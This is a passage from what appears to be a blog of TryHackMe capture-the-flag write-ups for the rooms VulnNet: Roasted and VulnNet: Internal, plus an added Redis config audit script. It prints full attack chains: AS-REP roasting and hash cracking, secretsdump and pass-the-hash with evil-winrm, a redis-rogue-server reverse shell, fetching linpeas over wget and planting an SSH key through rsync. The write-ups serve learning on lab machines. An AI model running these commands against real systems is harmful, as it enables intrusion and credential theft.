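        "unprivileged_userns_clone": read_sysctl("/proc/sys/kernel/unprivileged_userns_clone"),
        "max_user_namespaces": read_sysctl("/proc/sys/user/max_user_namespaces"),
    }


if __name__ == "__main__":
    release = os.uname().release if hasattr(os, "uname") else "3.13.0-32-generic"
    print(preflight(release))
```

Whatever the result, keep in mind that 37292 writes /etc/ld.so.preload (visible in the output above); confirm it is gone when you are done, because a stale entry there breaks every dynamically linked binary on the host.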

Tryhackme - VulnNet: Roasted

  1. Reconnaissance
  2. Privilege escalation

intro

Hello, it's me again. Today I'm going to solve the TryHackMe CTF room VulnNet: Roasted.

Reconnaissance

As usual, the first thing to do is scan for open ports on the target.

Open 10.10.15.106:88
Open 10.10.15.106:135
Open 10.10.15.106:139
Open 10.10.15.106:445
Open 10.10.15.106:389
Open 10.10.15.106:464
Open 10.10.15.106:593
Open 10.10.15.106:636
Open 10.10.15.106:3268
Open 10.10.15.106:3269
Open 10.10.15.106:49684
Open 10.10.15.106:49697
Open 10.10.15.106:49669
Open 10.10.15.106:49670
Open 10.10.15.106:49665

That is a lot of open ports, but the room intro already says this is a Windows machine, and 88 (Kerberos), 389/636 and 3268/3269 (LDAP and Global Catalog) alongside 445 (SMB) mean it is a domain controller. I'll start with the Windows services: 135, 139, 445 and 389.

Check the file shares with smbclient over a null session:

┌──(kalikali)-[~]
└─$ smbclient -L 10.10.15.106
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.15.106 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The two VulnNet-*-Anonymous shares show that the host allows anonymous access, so I'll enumerate with that account.

Using impacket's lookupsid, which brute-forces RIDs through LSARPC over the anonymous session to obtain a full account list:

┌──(kalikali)-[~]
└─$ impacket-lookupsid anonymous@10.10.15.106
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.15.106
[*] StringBinding ncacn_np:10.10.15.106[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Keeping the SidTypeUser entries gives the domain's accounts:

Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

I put them all into a file, user.txt.

Then I test each of them for AS-REP roasting. GetNPUsers with -no-pass sends an AS-REQ without pre-authentication for every name in the list; the KDC refuses unless the account has DONT_REQUIRE_PREAUTH set, in which case it returns an AS-REP whose encrypted part is keyed from the user's password and can be cracked offline:

┌──(kalikali)-[~]
└─$ impacket-GetNPUsers -dc-ip 10.10.15.106 -usersfile user.txt -no-pass vulnnet-rst.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:06e72f956b790ca9f51e200ba6ba5533$85e557a35c7ce7cf1e9d648ca35799fa8e6a141a4aea843dd759a8cffae1aa642bb90eb031b5e0b68277413dcdbe4ca2c4bc55240aa9bda8401876df2a9e96991153ded0e68f46ef369f68587e2f486f4411c85730ae91b95d3cc8c351b54282d5bc52ba2268c3d529e70c83c6e16ffa85e72c596e5fadea45ea5260b8c10bcc96feee72536887d1626119e9bc96dbe8f3f9a0cf6fc3e30cd0a6b737745dd200718cf3c69314d467be57c47be6a37af19148b57c68af2544da5fd528485920f2894b2ee3594ba4c4b5f72e94bfb66bf32e3fee1f3a6918e021da7da1708607cca66dd386018d3e14968b9203179d5d06896669951ab2
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

The KDC_ERR_CLIENT_REVOKED response belongs to krbtgt, which is disabled; t-skid is the one account without pre-authentication. Save its hash to hash.txt and crack it with john:

┌──(kalikali)-[~]
└─$ sudo john hash.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)

Use t-skid and that password with smbclient; NETLOGON is now readable:

┌──(kalikali)-[~]
└─$ smbclient -U vulnnet-rst.local/t-skid //10.10.24.168/NETLOGON                              
Password for [VULNNET-RST.LOCAL\t-skid]:
Try "help" to get a list of possible commands.
smb: \> DIR
  .                                   D        0  Tue Mar 16 19:15:49 2021
  ..                                  D        0  Tue Mar 16 19:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 19:18:14 2021

                8771839 blocks of size 4096. 4554815 blocks available
smb: \> get ResetPassword.vbs /home/kali/ResetPassword.vbs
getting file \ResetPassword.vbs of size 2821 as /home/kali/ResetPassword.vbs (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Opening it, I find a new username and password: the script resets a-whitehat's password to a hard-coded value, so that value is very likely still current.

┌──(kalikali)-[~]
└─$ cat ResetPassword.vbs 
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName  

With those credentials, use evil-winrm to get a shell on the host:

┌──(kalikali)-[~]
└─$ sudo evil-winrm -i 10.10.24.168 -u a-whitehat -p "bNdKVkjv3RR9ht"
[sudo] password for kali: 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents> dir
*Evil-WinRM* PS C:\Users\a-whitehat\Documents> cd \Users
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        12/5/2022   8:57 AM                a-whitehat
d-----        3/13/2021   3:20 PM                Administrator
d-----        3/13/2021   3:42 PM                enterprise-core-vn
d-r---        3/11/2021   7:36 AM                Public


*Evil-WinRM* PS C:\Users> cd enterprise-core-vn\Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> dir


    Directory: C:\Users\enterprise-core-vn\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt

Privilege escalation

I'll try to dump credentials with impacket-secretsdump using a-whitehat's password:

┌──(kalikali)-[~]
└─$ impacket-secretsdump vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.24.168
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::

So I have the Administrator NT hash. Log in with evil-winrm using pass-the-hash (-H):

┌──(kalikali)-[~]
└─$ evil-winrm -i 10.10.24.168 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop/
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt

system.txt is the root flag.

Tryhackme - VulnNet: Internal

  1. Reconnaissance
  2. RCE
  3. User flag
  4. Privilege escalation
    1. SSH

intro

Hello, it's me again. Today I'm going to solve the TryHackMe CTF room VulnNet: Internal.

Reconnaissance

As usual, the first thing to do is scan for open ports on the target host.

PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e278f48ae2ff889bb8913e39afd6340 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4fe0be25c88b563138550ddd586abbd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82ea4885f02a237e0ea9d9140a602fad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38730/udp6  mountd
|   100005  1,2,3      40715/tcp6  mountd
|   100005  1,2,3      49113/tcp   mountd
|   100005  1,2,3      51452/udp   mountd
|   100021  1,3,4      42359/tcp6  nlockmgr
|   100021  1,3,4      43398/udp6  nlockmgr
|   100021  1,3,4      43415/tcp   nlockmgr
|   100021  1,3,4      49938/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open  rsync       syn-ack (protocol version 31)
2049/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)
6379/tcp  open  redis       syn-ack Redis key-value store
43415/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)
49113/tcp open  mountd      syn-ack 1-3 (RPC #100005)
51197/tcp open  mountd      syn-ack 1-3 (RPC #100005)
60935/tcp open  mountd      syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-11-23T02:16:00
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 23538/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 60791/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 27828/udp): CLEAN (Failed to receive data)
|   Check 4 (port 56651/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2022-11-23T03:16:00+01:00
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000

I'll start with SMB on ports 139 and 445. First, check the shared folders

┌──(kalikali)-[~]
└─$ smbmap -H 10.10.118.210
[+] Guest session       IP: 10.10.118.210:445   Name: 10.10.118.210                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        shares                                                  READ ONLY       VulnNet Business Shares
        IPC$                                                    NO ACCESS       IPC Service (vulnnet-internal server (Samba, Ubuntu))

Access the shares folder

┌──(kalikali)-[~]
└─$ smbclient \\\\10.10.118.210\\shares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb  2 04:20:09 2021
  ..                                  D        0  Tue Feb  2 04:28:11 2021
  temp                                D        0  Sat Feb  6 06:45:10 2021
  data                                D        0  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3279224 blocks available
smb: \> cd temp
smb: \temp\> dir
  .                                   D        0  Sat Feb  6 06:45:10 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  services.txt                        N       38  Sat Feb  6 06:45:09 2021

                11309648 blocks of size 1024. 3279684 blocks available
smb: \temp\> get services.txt /home/kali/
Error opening local file /home/kali/           
smb: \temp\> scopy services.txt /home/kali/
Failed to create file \temp\home\kali\. NT_STATUS_OBJECT_PATH_NOT_FOUND
smb: \temp\> get services.txt 
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \temp\> 
smb: \temp\> cd ..
smb: \> ls
  .                                   D        0  Tue Feb  2 04:20:09 2021
  ..                                  D        0  Tue Feb  2 04:28:11 2021
  temp                                D        0  Sat Feb  6 06:45:10 2021
  data                                D        0  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3277876 blocks available
smb: \> cd data
smb: \data\> ls
  .                                   D        0  Tue Feb  2 04:27:33 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  data.txt                            N       48  Tue Feb  2 04:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3277852 blocks available
smb: \data\> get data.txt 
getting file \data\data.txt of size 48 as data.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \data\> get business-req.txt 
getting file \data\business-req.txt of size 190 as business-req.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \data\> 

Opening services.txt on my local machine gives me the first flag.

From the other two files I get two messages

┌──(kalikali)-[~]
└─$ cat data.txt  
Purge regularly data that is not needed anymore
                                  
┌──(kalikali)-[~]
└─$ cat business-req.txt 
We just wanted to remind you that were waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
                                     
┌──(kalikali)-[~]
└─$ 

There's nothing more to exploit on these two ports, so I'll move on to the NFS mount

RCE

┌──(kalikali)-[~]
└─$ showmount -e 10.10.116.142                                           
Export list for 10.10.116.142:
/opt/conf *
┌──(kalikali)-[~]
└─$ sudo mount -t nfs 10.10.116.142:/opt/conf /home/kali/THM-Vulnet -o nolock
┌──(kalikali)-[~]
└─$ tree THM-Vulnet 
THM-Vulnet
├── hp
│   └── hplip.conf
├── init
│   ├── anacron.conf
│   ├── lightdm.conf
│   └── whoopsie.conf
├── opt
├── profile.d
│   ├── bash_completion.sh
│   ├── cedilla-portuguese.sh
│   ├── input-method-config.sh
│   └── vte-2.91.sh
├── redis
│   └── redis.conf
├── vim
│   ├── vimrc
│   └── vimrc.tiny
└── wildmidi
    └── wildmidi.cfg

7 directories, 12 files
                                     
┌──(kalikali)-[~]
└─$ 

I'll focus on analysing redis first, because I saw that service in the scan above; something here might be exploitable, and there may be a password for accessing this service. I tried searching for “pass” and got a result

pass-redis

Now let's look for ways to exploit redis

6379 - Pentesting Redis - HackTricks

Use Redis Rogue Server to get RCE

┌──(kalikali)-[~/redis-rogue-server]
└─$ python redis-rogue-server.py --rhost 10.10.116.142 --lhost 10.6.0.191 --lport 2402 --passwd B65Hx562F@ggAZ@F
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 10.10.116.142:6379
[info] SERVER 10.6.0.191:2402
[info] Setting master...
[info] Authenticating...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address:

At this step, before entering the address, I'll create a listener on port 9001

nc -lnvp 9001

Then enter the IP and port of my local machine

Reverse server address: 10.6.0.191
Reverse server port: 9001
[info] Reverse shell payload sent.
[info] Check at 10.6.0.191:9001
[info] Unload module...

Back to the listener

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.116.142] 53768
id
uid=112(redis) gid=123(redis) groups=123(redis)
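The two things that made this foothold possible are a Redis password sitting in a world-mountable NFS export and a Redis service that still accepts the replication and module commands the rogue-server tool abuses. The following audit script is an added example, not part of the original write-up: both configs are constructed samples (the box's real /opt/conf/redis/redis.conf is not reproduced), and it reports the weak settings beside a hardened variant.

```python
"""Audit a redis.conf for the weaknesses this write-up relies on.

Added example, not part of the original write-up. Both configs below are
constructed samples; the box's real redis.conf is not reproduced.
"""

# Constructed: a config resembling what an exported redis.conf might contain.
WEAK_CONF = """\
# Redis configuration (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
requirepass PLACEHOLDER_PASSWORD
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: the same service with the dangerous commands disabled.
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass PLACEHOLDER_PASSWORD
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
"""

# Commands that, left reachable, let an authenticated client turn Redis into
# code execution: CONFIG SET dir/dbfilename, replication from a rogue master,
# MODULE LOAD of an attacker-supplied shared object.
DANGEROUS_COMMANDS = ("CONFIG", "MODULE", "REPLICAOF", "SLAVEOF")


def parse_redis_conf(text):
    """Return (directives, renamed): directives maps each directive to the
    argument list of its last occurrence; renamed maps an original command
    name (upper-case) to its new name, where "" means disabled."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        name, args = parts[0].lower(), parts[1:]
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1].strip('"')
        else:
            directives[name] = args
    return directives, renamed


def audit_redis_conf(text, readable_by_others=False):
    """Return a list of findings. readable_by_others states whether untrusted
    users can read the file, e.g. through an NFS export mountable by anyone."""
    directives, renamed = parse_redis_conf(text)
    findings = []
    bind = directives.get("bind", [])
    if not bind or "0.0.0.0" in bind or "*" in bind:
        findings.append("bind: listens on all interfaces")
    if directives.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode: disabled")
    if "requirepass" not in directives:
        findings.append("requirepass: not set, unauthenticated access")
    elif readable_by_others:
        findings.append("requirepass: password exposed to anyone who can read the config")
    for cmd in DANGEROUS_COMMANDS:
        # Renaming to a non-empty name is obscurity, not a control; only "" disables it.
        if renamed.get(cmd) != "":
            findings.append(f'{cmd}: still reachable (use rename-command {cmd} "" to disable)')
    return findings


if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF, readable_by_others=True))
    print("hardened:", audit_redis_conf(HARDENED_CONF) or "no findings")
```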

User flag

To save time, I decided to upload linPEAS to the machine.

Start a local HTTP server in the directory containing linpeas.sh

┌──(kalikali)-[~]
└─$ python -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...

The /tmp directory is fully writable and executable, so I'll download the file there, change its permissions and run it

redis@vulnnet-internal:/$ cd tmp
cd tmp
redis@vulnnet-internal:/tmp$ wget http://10.6.0.191:9001/linpeas.sh
wget http://10.6.0.191:9001/linpeas.sh
--2022-11-23 09:04:33--  http://10.6.0.191:9001/linpeas.sh
Connecting to 10.6.0.191:9001... 
connected.
HTTP request sent, awaiting response... 
200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 808.42K   355KB/s    in 2.3s    

2022-11-23 09:04:36 (355 KB/s) - 'linpeas.sh' saved [827827/827827]

redis@vulnnet-internal:/tmp$ 
redis@vulnnet-internal:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
redis@vulnnet-internal:/tmp$ ./linpeas.sh

Going back to the room information for a moment: the hint for the second flag says the flag is inside a db file. After linpeas finished, I noticed an rdb file belonging to redis

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                            
  Group redis:                                                                                                                                                                               
/tmp/linpeas.sh                                                                                                                                                                              
/run/redis/redis-server.pid
/var/log/redis/redis-server.log.1.gz
/var/log/redis/redis-server.log
/var/lib/redis/dump.rdb

Opening this file gives me the second flag and a public key

However, in the same file I noticed a rather odd string, possibly base64

code

After a while spent getting the format of this string right, I managed to decode it

Here it is

Remember that rsync on port 873 also showed up above. I went back to the HackTricks book to look for a way to exploit it.

Using metasploit I found that the shared module is called files

msf6 auxiliary(scanner/rsync/modules_list) > run

[+] 10.10.116.142:873     - 1 rsync modules found: files
[*] 10.10.116.142:873     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rsync/modules_list) > 

Now try rsync as described in the guide, using the password just decoded in CyberChef above

┌──(kalikali)-[~]
└─$ rsync -av --list-only rsync://rsync-connect@10.10.116.142/files

It lists every file in this share; of course the list is far too long to paste here. To read these files I have to clone them to my local machine

┌──(kalikali)-[~]
└─$ rsync -av rsync://rsync-connect@10.10.116.142/files /home/kali/rsync 

Back on the local machine

┌──(kalikali)-[~/rsync/sys-internal]
└─$ ll
total 36
drwx------ 2 kali kali 4096 Feb  1  2021 Desktop
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Documents
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Downloads
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Music
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Pictures
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Public
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Templates
-rw------- 1 kali kali   38 Feb  6  2021 user.txt
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Videos

So I found the user flag

Privilege escalation

Looking back at the file listing above, I noticed there is a .ssh directory, but it's empty.

So I'll try uploading my own public key to the machine in order to log in over ssh

┌──(kalikali)-[~/rsync]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
                                         
┌──(kalikali)-[~/rsync]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.116.142/files/sys-internal/.ssh   
Password: 

SSH

┌──(kalikali)-[~/rsync]
└─$ ssh sys-internal@10.10.116.142    
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
